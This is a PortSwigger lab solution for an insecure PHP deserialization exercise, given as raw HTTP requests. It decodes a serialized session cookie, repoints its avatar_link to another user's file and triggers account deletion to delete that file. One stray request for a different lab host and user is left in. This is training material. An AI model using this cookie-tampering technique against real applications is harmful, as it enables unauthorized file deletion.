Port Swigger Using application functionality to ex
Using application functionality to exploit insecure deserialization
Solution
Login to website as user: wiener
POST /login HTTP/2
Host: 0a86007004b6e34880f4858900b600e1.web-security-academy.net
Cookie: session=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net
Referer: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0a86007004b6e34880f4858900b600e1.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJtMnJ3bTdybWo2eXpzZ201OTV0c3RzNXdyemY0aGljbiI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Edit cookie session
Edit cookie session, add path to file: /home/carlos/morale.txt and modify from s:19 to s:23
OLD: Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJtMnJ3bTdybWo2eXpzZ201OTV0c3RzNXdyemY0aGljbiI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d
___
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"m2rwm7rmj6yzsgm595tsts5wrzf4hicn";s:11:"avatar_link";s:19:"users/wiener/avatar";}
___
NEW:
Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJtMnJ3bTdybWo2eXpzZ201OTV0c3RzNXdyemY0aGljbiI7czoxMToiYXZhdGFyX2xpbmsiO3M6MjM6Ii9ob21lL2Nhcmxvcy9tb3JhbGUudHh0Ijt9
___
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"m2rwm7rmj6yzsgm595tsts5wrzf4hicn";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
---
POST /my-account/delete HTTP/2
Host: 0ad0000203f0e079832d072d00ff007f.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjU6ImdyZWdnIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI6ImsyZ200bmRpenJqaGpyYzAxY2Z6ejNrcXhpbzczMGpoIjtzOjExOiJhdmF0YXJfbGluayI7czoxODoidXNlcnMvZ3JlZ2cvYXZhdGFyIjt9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: https://0ad0000203f0e079832d072d00ff007f.web-security-academy.net
Referer: https://0ad0000203f0e079832d072d00ff007f.web-security-academy.net/my-account?id=gregg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
POST /my-account/delete HTTP/2
Host: 0a86007004b6e34880f4858900b600e1.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJtMnJ3bTdybWo2eXpzZ201OTV0c3RzNXdyemY0aGljbiI7czoxMToiYXZhdGFyX2xpbmsiO3M6MjM6Ii9ob21lL2Nhcmxvcy9tb3JhbGUudHh0Ijt9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net
Referer: https://0a86007004b6e34880f4858900b600e1.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Solved